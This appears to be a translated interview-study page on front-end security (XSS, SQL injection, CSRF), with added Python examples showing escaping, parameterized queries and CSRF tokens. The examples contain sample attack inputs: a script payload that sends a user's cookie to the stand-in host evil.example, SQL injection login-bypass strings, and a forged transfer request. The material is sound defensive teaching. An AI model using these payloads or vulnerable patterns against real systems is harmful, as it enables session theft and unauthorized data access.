Web Front-End Written Test Questions (3): Front-End Security Issues

Source: Internet
Author: User
Tags: form, post, csrf, attack


1. XSS

Cross-site scripting attacks are abbreviated XSS rather than CSS, so that they are not confused with the abbreviation for Cascading Style Sheets (CSS).

A malicious attacker inserts malicious HTML code into a web page; when a user browses that page, the HTML code embedded in it is executed in the user's browser, achieving whatever the attacker intended.
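The mechanism above comes down to one thing: user-supplied text is pasted into markup and the browser parses it as markup. The example below, added here as an illustration and not part of the original page, renders a constructed comment into a page twice, once by plain interpolation and once with output encoding, and checks whether the injected script or event handler survives. Python is used for all added examples on this page; the payloads, the `evil.example` host and the helper names are assumptions made for the example.

```python
import html

# Constructed payloads (assumption: sample input for this example, not from the page).
# Text-node context: a script tag that leaks the session cookie to the attacker.
SCRIPT_PAYLOAD = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
# Attribute context: close the attribute early and add an event handler.
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_vulnerable(comment, author):
    """Interpolates user input straight into the markup. Anything the browser
    reads as HTML (tags, a quote that ends an attribute) is treated as HTML."""
    return ('<div class="comment" data-author="%s">%s</div>'
            % (author, comment))


def render_escaped(comment, author):
    """Encodes & < > " ' in both the text node and the attribute value, so the
    browser displays the input literally instead of parsing it."""
    return ('<div class="comment" data-author="%s">%s</div>'
            % (html.escape(author, quote=True), html.escape(comment, quote=True)))


def looks_injected(rendered):
    """Heuristic check on the rendered page: a live <script> tag or an
    injected event-handler attribute means the input was interpreted as HTML."""
    low = rendered.lower()
    return "<script" in low or ' onmouseover="' in low


if __name__ == "__main__":
    print(looks_injected(render_vulnerable(SCRIPT_PAYLOAD, "alice")))   # True
    print(looks_injected(render_vulnerable("hi", ATTR_PAYLOAD)))        # True
    print(looks_injected(render_escaped(SCRIPT_PAYLOAD, ATTR_PAYLOAD)))  # False
    print(render_escaped(SCRIPT_PAYLOAD, "alice"))
```

Note that `html.escape` with `quote=True` is the right primitive for text nodes and quoted attribute values only; input placed inside a `<script>` block, a URL, or an unquoted attribute needs a context-specific encoding, which is why templating engines escape by default per context.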


(1) attacks from within

Mainly refers to exploiting a vulnerability in the target program itself to construct a cross-site statement, for example the cross-site vulnerability that existed in Dvbbs' showerror.asp.

(2) attacks from outside

Mainly refers to constructing a web page that carries an XSS vulnerability, or finding a cross-site vulnerability on some site other than the target. If we want to infiltrate a site, we build a page that has a cross-site vulnerability, construct the cross-site statement, and then combine it with other techniques, such as social engineering, to trick the target server's administrator into opening it.

2. SQL Injection

SQL injection: SQL commands are inserted into a web form submission, or into the query string of a domain name or page request, so that the server is tricked into executing a malicious SQL command.


(1) Validate user input with regular expressions, for example checking for single quotes, the double-hyphen comment marker (--), or SQL reserved words

(2) Query data through parameterized stored procedures or LINQ to SQL

(3) Use parameterized SQL statements
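The three measures are easiest to compare side by side. The example below, added here and not part of the original page, builds a constructed in-memory SQLite users table, logs in through a string-concatenated query and then through a parameterized one (measure 3), and runs the regular-expression check from measure 1 over the inputs. The table contents and account names are assumptions made for the example.

```python
import re
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows (assumption: test
    data for this example, not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation, so a quote in the form
    field ends the literal and the rest of the input becomes SQL syntax."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, username, password):
    """Measure (3): placeholders send the values separately from the statement
    text, so the database never re-parses them as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Measure (1): a regular-expression tripwire for a single quote, the '--'
# comment marker and common SQL keywords. Treat it as a logging signal, not
# as the defense: it also fires on legitimate input such as O'Brien.
SUSPICIOUS = re.compile(r"'|--|\b(select|union|or|and|drop|insert|delete)\b",
                        re.IGNORECASE)


def suspicious_input(value):
    return SUSPICIOUS.search(value) is not None


if __name__ == "__main__":
    conn = make_db()
    # Comment out the password check; the concatenated statement becomes
    #   ... WHERE username = 'admin' --' AND password = 'x'
    print(login_vulnerable(conn, "admin' --", "x"))             # True
    print(login_parameterized(conn, "admin' --", "x"))          # False
    # Make the WHERE clause always true via OR precedence
    print(login_vulnerable(conn, "nobody", "' OR '1'='1"))      # True
    print(login_parameterized(conn, "nobody", "' OR '1'='1"))   # False
    print(suspicious_input("admin' --"), suspicious_input("O'Brien"))  # True True
```

The parameterized version is the fix; the regular expression only tells you that someone tried. Note the false positive on `O'Brien`: a blocklist that rejects quotes breaks legitimate names, which is one reason input filtering alone is not an acceptable defense.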


3. CSRF

CSRF (Cross-Site Request Forgery), also known as "one-click attack" or "session riding" and usually abbreviated CSRF or XSRF, is a malicious exploitation of a web site. Although it sounds similar to cross-site scripting (XSS), it is very different from XSS and almost the opposite in the way the attack works.

XSS exploits the trust a user places in a site, whereas CSRF exploits the trust a site places in a user, by forging requests that appear to come from that trusted user. Compared with XSS, CSRF attacks are less widely known (so fewer resources exist for guarding against them) and harder to defend against, which is why they are often regarded as more dangerous than XSS.


    1. They rely on the user's authenticated identity on the site.
    2. They exploit the site's trust in that identity.
    3. They trick the user's browser into sending an HTTP request to the target site.
    4. A GET request can also be triggered by an IMG tag, so an image tag alone is enough to mount a CSRF attack.

Precautionary measures:

For a web site, switching from a persistent authorization mechanism (such as a cookie or HTTP authentication) to a per-request one, for example a hidden field carrying a secret token in every form, helps prevent these attacks. A related approach is to include secret information in the form: a user-specific code that is validated in addition to the cookie.

Another option is the "double submit" cookie. This method only works with Ajax requests, but it can be applied as a global fix without changing a large number of forms. If the authentication cookie is read by JavaScript before the POST, the browser's cross-domain restrictions apply: when the server requires the value of the authentication cookie to be repeated in the POST body or in the URL, the request must have come from a trusted domain, because other domains cannot read that cookie.

Contrary to common belief, using POST instead of GET does not provide effective protection, because JavaScript can issue forged POST requests. Nonetheless, requests with security-relevant side effects should always be sent with POST: a POST does not leave a trail of the data in web server and proxy logs, whereas a GET does.

Although CSRF is fundamentally a web-application problem rather than a user problem, users can protect their accounts on sites that lack a secure design by logging out before browsing other sites, or by clearing the browser's cookies at the end of a browsing session.
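The two token-based defences described above, the hidden field validated against the session and the double-submit cookie, can be shown in a few lines against a simulated transfer endpoint. The example below is added here and is not part of the original page; it models the browser as the cookies it attaches automatically and the submitting page as the form body it controls. The session store, the `/transfer` handler, the account names and the `evil.example` origin are assumptions made for the example.

```python
import hmac
import secrets

# Server-side session store. Assumption: an in-memory dict stands in for the
# real session backend; everything below is constructed for this example.
SESSIONS = {}


def start_session():
    """Simulate login. Returns the cookies the server sets on the browser.

    The CSRF token is kept server-side against the session (for the hidden
    field check) and also sent as its own cookie (for the double-submit check,
    which needs no server-side state).
    """
    sid = secrets.token_urlsafe(16)
    token = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"csrf_token": token}
    return {"session": sid, "csrf": token}


def render_transfer_form(cookies):
    """The site's own page embeds the session's token in a hidden field."""
    sess = SESSIONS[cookies["session"]]
    return {"_csrf": sess["csrf_token"], "to": "", "amount": ""}


def check_synchronizer_token(cookies, form):
    """Hidden-field check: the submitted token must equal the one stored for
    this session. A page on another origin never received the form, so it
    cannot know the value."""
    sess = SESSIONS.get(cookies.get("session", ""))
    if sess is None:
        return False
    return hmac.compare_digest(sess["csrf_token"], form.get("_csrf", ""))


def check_double_submit(cookies, form):
    """Double-submit check: the csrf cookie value must be repeated in the body.
    The browser attaches the cookie to any request, but only script running on
    this site's origin can read it and copy it into the body, so a cross-site
    page cannot satisfy the check."""
    cookie_val = cookies.get("csrf", "")
    if not cookie_val:
        return False
    return hmac.compare_digest(cookie_val, form.get("_csrf", ""))


def no_check(cookies, form):
    """Baseline: a site that relies on the session cookie alone."""
    return True


def handle_transfer(cookies, form, csrf_check):
    """A state-changing POST handler. `cookies` is what the victim's browser
    attaches automatically; `form` is whatever the submitting page put in
    the body."""
    if cookies.get("session") not in SESSIONS:
        return "401 not logged in"
    if not csrf_check(cookies, form):
        return "403 csrf check failed"
    return "200 transferred %s to %s" % (form["amount"], form["to"])


if __name__ == "__main__":
    victim = start_session()

    # Legitimate flow: the site renders the form and the user fills it in.
    legit = render_transfer_form(victim)
    legit.update({"to": "alice", "amount": "10"})
    print(handle_transfer(victim, legit, check_synchronizer_token))   # 200 ...

    # Forged flow: a POST form on evil.example auto-submits in the victim's
    # browser. The browser adds the victim's cookies, but the attacker cannot
    # add the token because the cross-domain rule hides the cookie from it.
    forged = {"to": "mallory", "amount": "1000"}
    print(handle_transfer(victim, forged, no_check))                  # 200: POST alone does not help
    print(handle_transfer(victim, forged, check_synchronizer_token))  # 403
    print(handle_transfer(victim, forged, check_double_submit))       # 403
```

The `no_check` run is the point made in the text about POST: the forged POST reaches the handler with a valid session and succeeds, so the HTTP method is not the defence, the token is. One caveat on the double-submit variant: it holds only while no attacker-controlled page can set cookies for the site's domain (a compromised sibling subdomain can), so binding the cookie value to the session, as the hidden-field check does, is the stronger of the two.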
